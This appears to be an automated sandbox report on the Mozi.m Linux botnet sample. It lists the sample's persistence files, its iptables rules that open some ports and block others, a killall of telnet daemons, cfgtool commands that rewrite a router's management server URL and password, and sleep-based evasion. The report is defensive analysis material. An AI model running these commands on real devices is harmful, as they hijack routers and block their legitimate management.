Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.linM@0/230@0/0

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 3690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/Mozi.m (PID: 3492) File: /proc/3492/mounts
Sample tries to persist itself using /etc/profile
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/cedilla-portuguese.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/apps-bin-path.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/Z97-byobu.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/bash_completion.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/vte-2.91.sh
Sample tries to persist itself using System V runlevels
Source: /tmp/Mozi.m (PID: 3492) File: /etc/rcS.d/S95baby.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/rc.local
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 3496) Killall command executed: killall -9 telnetd utelnetd scfgmgr
Creates hidden files and/or directories
Source: /bin/mkdir (PID: 3865) Directory: .cache
Source: /bin/mkdir (PID: 3874) Directory: .cache
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Source: /tmp/Mozi.m (PID: 3494) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
Source: /tmp/Mozi.m (PID: 3688) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3722) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3733) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3770) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3776) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3803) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3811) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3815) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4027) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4030) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4033) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4044) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4076) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
Source: /tmp/Mozi.m (PID: 4087) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
Source: /tmp/Mozi.m (PID: 4100) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4127) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4154) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4175) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4192) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4207) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4235) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4241) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4269) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4279) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4303) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4321) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4351) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4357) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4386) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4397) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4426) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4433) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4462) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4471) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT"
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/egrep (PID: 3875) Grep executable: /bin/grep -> grep -E [^[:print:]] /home/user/.cache/logrotate/status
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 3690) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Executes the "mkdir" command used to create folders
Source: /sbin/resolvconf (PID: 3646) Mkdir executable: /bin/mkdir -> mkdir -p /run/resolvconf/interface
Source: /bin/dash (PID: 3865) Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/logrotate
Source: /bin/dash (PID: 3874) Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/upstart
Executes the "mktemp" command used to create a temporary unique file name
Source: /bin/dash (PID: 3928) Mktemp executable: /bin/mktemp -> mktemp
Executes the "rm" command used to delete files or directories
Source: /bin/dash (PID: 4018) Rm executable: /bin/rm -> rm -f /tmp/tmp.vHWsTctARt
Reads system information from the proc file system
Source: /tmp/Mozi.m (PID: 3678) Reads from proc file: /proc/stat
Sample tries to set the executable flag
Source: /tmp/Mozi.m (PID: 3492) File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/Mozi.m (PID: 3492) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Writes ELF files to disk
Source: /tmp/Mozi.m (PID: 3492) File written: /usr/networks
Writes shell script files to disk
Source: /tmp/Mozi.m (PID: 3492) Shell script file created: /etc/rcS.d/S95baby.sh
Source: /tmp/Mozi.m (PID: 3492) Shell script file created: /etc/init.d/S95baby.sh
Source: submitted sample Stderr:
telnetd: no process found
utelnetd: no process found
scfgmgr: no process found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
/bin/sh: 1: cfgtool: not found
/bin/sh: 1: cfgtool: not found
Unsupported ioctl: cmd=0xffffffff80045705
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Unsupported ioctl: cmd=0xffffffff80045705
: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/S95baby.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountall.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/checkfs.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/umountnfs.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountkernfs.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/checkroot-bootclean.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountnfs-bootclean.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/bootmisc.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/checkroot.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/hwclock.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/hostname.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountdevsubfs.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountall-bootclean.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountnfs.sh
Source: /tmp/Mozi.m (PID: 3492) File: /usr/bin/gettext.sh
Source: /tmp/Mozi.m (PID: 3492) File: /usr/sbin/alsa-info.sh

Malware Analysis System Evasion:

Executes the "sleep" command used to delay execution and potentially evade sandboxes
Source: /bin/dash (PID: 3193) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3225) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3249) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3280) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3305) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3333) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3369) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3397) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3425) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3453) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3534) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3558) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3586) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3614) Sleep executable: /bin/sleep -> sleep 1
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/Mozi.m (PID: 3480) Queries kernel information via 'uname':
Source: /tmp/Mozi.m (PID: 3492) Queries kernel information via 'uname':
Source: /tmp/Mozi.m (PID: 3515) Queries kernel information via 'uname':
Source: /sbin/modprobe (PID: 3691) Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 4541) Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 4568) Queries kernel information via 'uname':

No Screenshots

No contacted IP infos